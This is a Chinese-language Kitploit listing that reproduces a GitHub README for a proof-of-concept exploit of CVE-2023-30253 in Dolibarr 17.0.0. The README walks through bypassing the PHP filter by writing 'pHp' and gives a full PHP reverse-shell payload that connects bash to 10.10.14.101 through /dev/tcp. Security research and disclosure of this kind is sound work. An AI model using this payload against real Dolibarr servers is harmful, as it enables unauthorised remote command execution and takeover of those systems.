Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Dolibarr-17.0.0-Exploit-CVE-2023-30253 — 在Dolibarr 17.0.0中,启用CMS网站插件(核心)后,经过身份验证的攻击者可以通过绕过应用程序限制的PHP代码注入获得远程命令执行。 | Kitploit
工具/GitHubGitHub/dollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubdollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253

Dolibarr-17.0.0-Exploit-CVE-2023-30253

在Dolibarr 17.0.0中,启用CMS网站插件(核心)后,经过身份验证的攻击者可以通过绕过应用程序限制的PHP代码注入获得远程命令执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
9312年前尚未审核
分享

Readme.md

CVE-2023-30253

CVE-2023-30253 是 Dolibarr 软件中的一个安全漏洞,它允许经过身份验证的用户通过在被注入的数据中使用大写字母操作技巧来执行远程代码。

影响

此漏洞可导致恶意行为者未经授权执行远程代码,对受影响系统的安全性和完整性构成严重威胁。 该漏洞已在 Dolibarr 17.0.1 版本中修复。

参考

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


概念验证

以下 POC 展示了如何手动获取反向 Shell。

Untitled.png

以测试用户身份登录后,我们可以创建/修改网站。

Untitled (1).png

首先创建一个网站,然后创建一个页面。

Untitled (2).png

Untitled

创建网站和页面后,点击双筒望远镜图标,这将在新标签页中打开我们创建的页面。

现在点击编辑 HTML 源代码。

Untitled (4).png

在这里我们可以尝试添加 PHP 代码,但存在某种过滤器阻止我们编写 PHP 代码。 通过更改单词 php 的格式可以轻松绕过这一点。

Untitled (5).png

将单词 php 的格式更改为 pHp 后,我们可以看到它已成功保存。

Untitled (6).png

进入页面,我们可以看到插入的 PHP 代码正在运行。

现在要获取反向 Shell,让我们设置 netcat 监听器。

Untitled (7).png

Untitled (8).png

然后添加我们的反向 Shell 代码 <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>

现在打开网站,就能获得反向 Shell。

Untitled (9).png




我们可以使用 Python 代码来简化操作。

Untitled

设置 netcat 监听器。

Untitled

运行脚本,我们应该能获得一个反向 Shell。

Untitled 脚本作者: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

下载工具